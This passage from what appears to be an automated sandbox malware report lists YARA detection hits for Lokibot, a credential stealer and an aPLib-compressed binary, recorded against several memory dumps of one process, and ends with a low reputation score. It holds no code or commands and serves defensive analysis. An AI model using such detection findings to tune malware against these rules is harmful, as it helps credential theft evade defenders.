                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Disassembly

                    No disassembly